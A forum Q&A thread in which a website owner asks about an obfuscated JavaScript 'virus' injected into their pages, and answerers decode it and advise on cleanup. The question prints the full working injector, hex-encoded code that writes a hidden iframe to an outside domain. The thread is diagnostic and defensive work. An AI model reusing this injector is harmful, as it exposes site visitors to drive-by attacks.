Javascript "virus"

Question

I have problem with some JS "virus" on all of my websites. They're on different hostings, and on some one of them appears this code.

<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
    var i49d9f1a846737 = 16;
    return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;
    var i49d9f1a847da9 = '';
    i49d9f1a848e47 = String.fromCharCode;
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32 blocks the website because he believes there is a virus. Deleting the code from sources doesn't help, because it reappears again. It can't be result of XSS, because it appears even on static websites.

I've tried to make full scan of my system and it didn't help. The only thing that is on all websites is Google Analytics, which I think couldn't cause this.

edit: You can see it for example at http://www.postuj.cz/test/ or at http://flavicius.php5.cz/.

Answer 1

It looks like Vundo or a variant of it. That piece of malware has a tendency to insert seemingly meaningless javascript into sites (on your end, not the server-side). I'd suggest trying Malwarebytes' Anti-Malware. Install it, update it, and do a full scan. If that fails, perhaps try researching options for removing Vundo specifically.

Answer 2

They're on different hostings, and on some one of them appears this code.

Is the code the same on every host? Can you give an example of one of the affected domains so we can check that the code exists on the server side and not just on your machine (which would normally be pretty unlikely).

The code you posted is certainly very suspicious. Once decoded, it writes an iframe to http://​ecom.rarebreedfootwear.com/? (it tries to add a cachebuster random number to the URL, but fails due to a typo).

There is nothing obviously exploity at that address — perhaps the final target exploit hasn't been put in place yet, or it's just a test run for a real attack later, but an unexpected JavaScript appearing on your site which decodes itself and adds an iframe is a huge red flag. Usually this means your server has been compromised and needs re-installing from scratch with new passwords.

ETA:

you can see it for example at hxxp://flavicius.php5.cz/

Thanks. I deleted the comment to hide the working URL, because it is indeed actually infected. Whether at an application level or Apache itself isn't clear, but every page has the suspect script at the bottom.

So at least the application and conceivably the server is compromised and should be taken off-line for cleaning, reinstallation, and diagnostics: you need to find out how the attackers got in so it doesn't happen again. As a first guess, check you have the latest version of WordPress, as it has suffered many security holes in the past.

Answer 3

I have written a server side code removal tool in ASP.Net Here. Hope this will help you save your time to clean the hosted files :) This is much faster than cleaning the files via FTP or your control panel.